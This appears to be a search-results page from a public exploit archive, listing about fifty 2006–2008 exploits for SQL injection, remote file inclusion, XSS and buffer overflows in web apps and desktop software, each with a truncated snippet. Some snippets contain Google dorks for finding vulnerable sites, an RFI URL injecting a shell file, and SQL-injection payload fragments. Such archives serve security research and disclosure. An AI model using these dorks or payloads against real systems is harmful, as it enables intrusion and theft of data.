41207 matches found
Total Video Player - vcen.dll Remote Off-by-One Crash
Total Video Player - vcen.dll Remote Off-by-One Crash Total Video Player vcen.dll Remote Heap Overflow Crash By Cn4phux. Vendor: http://www.effectmatrix.com/ Risk : high The "" tag fail to handle long strings, which can lead to a Heap overflow in TVP. This bug can be remote or local, TVP parse an...
Microsoft XML Core Services DTD - Cross-Domain Scripting (MS08-069)
Microsoft XML Core Services DTD - Cross-Domain Scripting MS08-069 KB955218 - CVE-2008-4029 - JA var dom = new ActiveXObject"Msxml2.DOMDocument.3.0"; dom.async = false; var url = "http://www.milw0rm.com/forfun.dtd"; var xml = ""; if dom.loadXMLxml == 0 alert"Blue or Red Pill? " +...
PHP-Fusion Mod recept - kat_id SQL Injection
PHP-Fusion Mod recept - kat_id SQL Injection PHP-Fusion Mod recept kat_id Remote SQL Injection Vulnerability Author : boom3rang webpage : www.khg-crew.ws greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er - -=Kosova Hackers Group-= Dork:...
ICONICS Vessel Gauge Switch 8.02.140 - ActiveX Buffer Overflow (Metasploit)
ICONICS Vessel Gauge Switch 8.02.140 - ActiveX Buffer Overflow Metasploit $Id: iconicsdlgwrapper.rb 1 2008-09-21 22:43:00Z kf $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more...
e-vision CMS 2.02 - SQL Injection Arbitrary File Upload Information Gathering
e-vision CMS 2.02 - SQL Injection Arbitrary File Upload Information Gathering eVision 2.0 Sql Injection/Remote File Upload/IG AUTHOR : IRCRASH R3d.W0rm Sina Yazdanmehr Discovered by : IRCRASH R3d.W0rm Sina Yazdanmehr Our Site : Http://IRCRASH.COM IRCRASH Team Members : Dr.Crash - R3d.w0rm Sina...
Joomla! Component jabode - id SQL Injection
Joomla! Component jabode - id SQL Injection Joomla Component jabode Remote SQL injection Author : His0k4 ALGERIAN HaCkEr Dork : inurl:comjabode POC :...
PHP 5.2.6 - chdir() Function http URL Argument Safe_mode Restriction Bypass
PHP 5.2.6 - chdir() Function http URL Argument Safe_mode Restriction Bypass source: https://www.securityfocus.com/bid/29796/info PHP is prone to multiple 'safe_mode' restriction-bypass vulnerabilities. Successful exploits could allow an attacker to determine the presence of files in unauthorized...
NASA Ames Research Center BigView 1.8 - .PNM Stack Buffer Overflow (PoC)
NASA Ames Research Center BigView 1.8 - .PNM Stack Buffer Overflow PoC source: https://www.securityfocus.com/bid/29517/info NASA Ames Research Center BigView is prone to a remote stack-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying ...
CMS WebManager-Pro - Multiple SQL Injections
CMS WebManager-Pro - Multiple SQL Injections Discovered by dun \ dunatstrcpy.eu CMS Webmanager-pro Remote SQL Injection Vulnerability Script site:...
GameCMS Lite 1.0 - systemId SQL Injection
GameCMS Lite 1.0 - systemId SQL Injection Kings of injection...
MyBB Plugin Custom Pages 1.0 - SQL Injection
MyBB Plugin Custom Pages 1.0 - SQL Injection MyBulletin Board MyBB Plugin "Custom Pages 1.0" - SQL Injection Vulnerability found by: LidlosesAuge Greetz to: free-hack.com Vulnerability: Document: pages.php GET-Parameter: page Dork: inurl:"pages.php" + intext:"powered by mybb" Example:...
ZYXEL ZyWALL QuaggaZebra - Default Password Remote Code Execution
ZYXEL ZyWALL QuaggaZebra - Default Password Remote Code Execution Name: ZyXEL ZyWALL Quagga/Zebra Remote Root Vulnerability Release Date: 10 March 2008 Discover: Pranav Joshi Vendor: ZyXEL Products Affected: ZyWALL Status on other affected products & firmwares pending from vendor’s end...
Xine-Lib 1.1.11 - Multiple Heap Remote Buffer Overflow Vulnerabilities
Xine-Lib 1.1.11 - Multiple Heap Remote Buffer Overflow Vulnerabilities // source: https://www.securityfocus.com/bid/28370/info The 'xine-lib' library is prone to multiple heap-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied input...
AuraCMS 2.2.1 - X-Forwarded-For HTTP Header Blind SQL Injection
AuraCMS 2.2.1 - X-Forwarded-For HTTP Header Blind SQL Injection !/usr/bin/perl -w Indonesian Newhack Security Advisory AuraCMS 2.x online.php - Remote Blind SQL Injection Exploit Time : Feb 15 2008 01:00PM Software : AuraCMS Version : 2.0 2.1 2.2.1 Vendor :...
eXV2 Module eblog 1.2 - blog_id SQL Injection
eXV2 Module eblog 1.2 - blog_id SQL Injection Powered by eXV2 eblog 1.2 SQL Injection AUTHOR : S@BUN HOME : http://www.milw0rm.com/author/1334 MAİL : [email protected] DORKS 1 : allinurl :"modules/eblog" DORK 2 : allinurl :"exoops/modules/eblog" EXPLOIT :...
Mapbender 2.4.4 - gaz SQL Injection
Mapbender 2.4.4 - gaz SQL Injection Advisory: SQL-Injections in Mapbender During a penetration test RedTeam Pentesting discovered multiple SQL-Injections in Mapbender. A remote attacker is able to execute arbitrary SQL commands and therefore can get e.g. valid usernames and password hashes of the...
Joomla! Component Quiz 0.81 - tid SQL Injection
Joomla! Component Quiz 0.81 - tid SQL Injection joomla SQL Injectioncomquizusertstshw AUTHOR : S@BUN HOME : http://www.hackturkiye.com http://www.milw0rm.com/author/1334 MAİL : [email protected] DORK 1 : allinurl: comquiz"tid" DORK 2 : allinurl: comquiz EXPLOIT : ALL PASSWORD AND...
phpBBViet 02.03.2007 - phpbb_root_path Remote File Inclusion
phpBBViet 02.03.2007 - phpbb_root_path Remote File Inclusion phpBBViet 0.22 phpbb_root_path Remote File Include Found: xoron...
Simple Machines Forum (SMF) 1.1.3 - Blind SQL Injection
Simple Machines Forum (SMF) 1.1.3 - Blind SQL Injection !/usr/bin/perl Written By Michael Brooks contact: th3dotr00katgmaildotcom SMF 1.1.3 Extremely fast Blind SQL Injection Exploit! -Binary Search -Multi-Threaded -NO benchmark's Two SQL Injection flaws. Works with magic_quotes_gpc=On or Off. Total...
Joomla! Component Joomlaradio 5.0 - Remote File Inclusion
Joomla! Component Joomlaradio 5.0 - Remote File Inclusion Joomla Radio v5 Component RFI Bug in : administrator/components/comjoomlaradiov5/admin.joomlaradiov5.php Variable : $mosConfiglivesite Download : http://www.joomlaos.de/option,comremository/Itemid,41/func,fileinfo/id,2661.html Dork:...
PHPMytourney - menu.php Remote File Inclusion
PHPMytourney - menu.php Remote File Inclusion Title : phpMytourney functionsfile Remote File Inclusion Vulnerability Author : S.W.A.T. Contact : [email protected] S.Page : http://script.vanta.ru/download.php?id=1178&clas=0 $$ : Free Site : Http://www.XmorS-Security.CoM - Http://www.xmors.com...
xGB 2.0 - xGB.php Remote Security Bypass
xGB 2.0 - xGB.php Remote Security Bypass / xGB 2.0 xGB.php Remote Permission Bypass Vulnerability Bug discovered by DarkFuneral http://www.darkfuneral89.altervista.org/ Affected Software: xGB CMS Site: "i don't know! :P" Severity: Critical Description: An attacker can edit all message in xGB Goog...
Prozilla Pub Site Directory - Directory.php?cat SQL Injection
Prozilla Pub Site Directory - Directory.php?cat SQL Injection Prozilla Pub Site Directory SQL Injection Vulnerability...
Oracle Database - SQL Compiler Views Unauthorized Manipulation
Oracle Database - SQL Compiler Views Unauthorized Manipulation source: https://www.securityfocus.com/bid/24887/info Oracle has released a Critical Patch Update advisory for July 2007 to address multiple vulnerabilities for supported releases. Earlier unsupported releases are likely to be affected...
eDocStore - doc.php?doc_id SQL Injection
eDocStore - doc.php?doc_id SQL Injection eDocStore Latest Versions Local File Inclusion Vulnerabilities...
XOOPS Module Glossarie 1.7 - sid SQL Injection
XOOPS Module Glossarie 1.7 - sid SQL Injection !/usr/bin/perl Script Name: XOOPS Module Glossarie : "; $dir = ; chop $dir; if $dir = /exit/ print "-- Exploit FailedYou Are Exited \n"; exit; if $dir = /// else print "-- Exploit FailedNo DIR \n"; exit; print "User ID uid: "; $id = ; chop $id;...
aForum 1.32 - CommonAbsDir Remote File Inclusion
aForum 1.32 - CommonAbsDir Remote File Inclusion AForum =1.33 Remote file inclusion Func.php Download Script : http://www.agner.org/software/msgbrd2/aforum.zip Thanks Str0ke D0rk:allintitle:List of messageboards Exploit : http://localhost/aforumpath/common/func.php?CommonAbsDir=shell.txt?...
study planner (studiewijzer) 0.15 - Remote File Inclusion
study planner (studiewijzer) 0.15 - Remote File Inclusion ECHOADV77$2007 Study planner Studiewijzer = 0.15 Remote...
FiSH-irssi - Multiple Remote Buffer Overflow Vulnerabilities
FiSH-irssi - Multiple Remote Buffer Overflow Vulnerabilities source: https://www.securityfocus.com/bid/22880/info FiSH is prone to multiple remote buffer-overflow vulnerabilities because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer...
NukeSentinel 2.5.05 - nsbypass.php Blind SQL Injection
NukeSentinel 2.5.05 - nsbypass.php Blind SQL Injection !/usr/bin/php URL: http://www.acid-root.new.fr/ Usage: $argv0 -url -victim Opts Options: -isadmin Is the victim an Admin 1 or a normal user default=0 ? -prefix Table prefix...
PHPBB2 MODificat 0.2.0 - functions.php Remote File Inclusion
PHPBB2 MODificat 0.2.0 - functions.php Remote File Inclusion phpBB2 MODificat phpbb_root_path Remote File Include Exploit Author: xoron xoron.biz Code:...
Opera 9.10 - .jpg Image DHT Marker Heap Corruption
Opera 9.10 - .jpg Image DHT Marker Heap Corruption Opera JPEG processing - Heap corruption vulnerabilities Date..: 8th September 2006 31th October 2006 update 3rd November 2006 update 5th January 2007 public release...
HP Tru64 4.05.1 - POSIX Threads Library Privilege Escalation
HP Tru64 4.05.1 - POSIX Threads Library Privilege Escalation source: https://www.securityfocus.com/bid/21035/info HP Tru64 is prone to a local privilege-escalation vulnerability. Exploiting this issue allows local attackers to execute arbitrary code with superuser privileges. Successful exploits...
PHP-Nuke 7.9 - Encyclopedia SQL Injection
PHP-Nuke 7.9 - Encyclopedia SQL Injection ? / Neo Security Team - Exploit made by Paisterist on 2006-10-22 http://www.neosecurityteam.net / $host="localhost"; $path="/phpnuke/"; $prefix="nuke"; $port="80"; $fp = fsockopen$host, $port, $errno, $errstr, 30; $data="query=fooaa&eid=foo'//UNION SELECT...
Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (1)
Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation 1 source: https://www.securityfocus.com/bid/20471/info The Netscape Portable Runtime API running on Sun Solaris 10 operating system is prone to a local privilege-escalation vulnerability. A successful exploit of this iss...
PPA Gallery 1.0 - functions.inc.php Remote File Inclusion
PPA Gallery 1.0 - functions.inc.php Remote File Inclusion ?php /...
OpenSSL SSLv2 - Null Pointer Dereference Client Denial of Service
OpenSSL SSLv2 - Null Pointer Dereference Client Denial of Service source: https://www.securityfocus.com/bid/20246/info OpenSSL is prone to a denial-of-service vulnerability. A malicious server could cause a vulnerable client application to crash, effectively denying service. !/usr/bin/perl...
Blojsom 2.31 - Cross-Site Scripting
Blojsom 2.31 - Cross-Site Scripting source: https://www.securityfocus.com/bid/20026/info Blojsom is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to have arbitrary script code execute in the browser ...
PHP Event Calendar 1.41.5 - index.php Multiple Cross-Site Scripting Vulnerabilities
PHP Event Calendar 1.41.5 - index.php Multiple Cross-Site Scripting Vulnerabilities source: https://www.securityfocus.com/bid/20001/info PHP Event Calendar is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issu...
Papoo CMS 3.2 - IBrowser Remote File Inclusion
Papoo CMS 3.2 - IBrowser Remote File Inclusion source: https://www.securityfocus.com/bid/19807/info Papoo CMS is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containin...
osCommerce 2.12.2 - product_info.php SQL Injection
osCommerce 2.12.2 - product_info.php SQL Injection source: https://www.securityfocus.com/bid/19774/info osCommerce is prone to an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied data. A successful exploit may allow an attacker to compromise the...
Ay System CMS 2.6 - main.php Remote File Inclusion
Ay System CMS 2.6 - main.php Remote File Inclusion Ay System Solutions CMS Exploit :...
Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution
Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution // MoBB Demonstration function Demo // Exploit for http://www.mozilla.org/security/announce/2006/mfsa2006-45.html // https://bugzilla.mozilla.org/show_bug.cgi?id=342267 // CVE-2006-3677 // The Java plugin is required for this to...
Fantastic Guestbook 2.0.1 - Guestbook.php HTML Injection
Fantastic Guestbook 2.0.1 - Guestbook.php HTML Injection source: https://www.securityfocus.com/bid/18942/info Fantastic GuestBook is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content...
Matt Wright Guestbook 2.3.1 - Guestbook.pl Multiple HTML Injection Vulnerabilities
Matt Wright Guestbook 2.3.1 - Guestbook.pl Multiple HTML Injection Vulnerabilities source: https://www.securityfocus.com/bid/17438/info Guestbook is prone to multiple HTML-injection vulnerabilities; the application fails to properly sanitize user-supplied input before using it in dynamically...
RealPlayer 10.5 (6.0.12.1040-1348) - SWF Buffer Overflow (PoC)
RealPlayer 10.5 6.0.12.1040-1348 - SWF Buffer Overflow PoC !/usr/bin/perl RealPlayer: Buffer overflow vulnerability / PoC CVE-2006-0323 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323 RealNetworks Advisory http://service.real.com/realplayer/security/03162006player/en/ Federico L. Boss...
WebAlbum 2.02pl - COOKIE[skin2] Remote Code Execution
WebAlbum 2.02pl - COOKIE[skin2] Remote Code Execution !/usr/bin/php -q -d short_open_tag=on this works with magic_quotes_gpc=Off\r\n"; echo "dork: WEBalbum 2004-2006 duda\r\n"; if $argc 126 $result.=" ."; else $result.=" ".$string$i; if...
nodez 4.6.1.1 mercury - Multiple Vulnerabilities
nodez 4.6.1.1 mercury - Multiple Vulnerabilities !/usr/bin/php -q -d short_open_tag=on ? echo "Nodez 4.6.1.1 Mercury possibly prior versions multiple vulnerabilities\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; / software: site:...
dotProject 2.0 - modulesprojectsgantt2.php?dPconfig[root_dir] Remote File Inclusion
dotProject 2.0 - modulesprojectsgantt2.php?dPconfig[root_dir] Remote File Inclusion source: https://www.securityfocus.com/bid/16648/info Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input...
EnterpriseGS 1.0 rc4 - Remote Command Execution
EnterpriseGS 1.0 rc4 - Remote Command Execution works against PHP5 usage: launch from Apache, fill in requested fields, then go! Sun-Tzu: "Thus the energy developed by good fighting men is as the momentum of a round stone rolled down a mountain thousands of feet in height. So much on the subject ...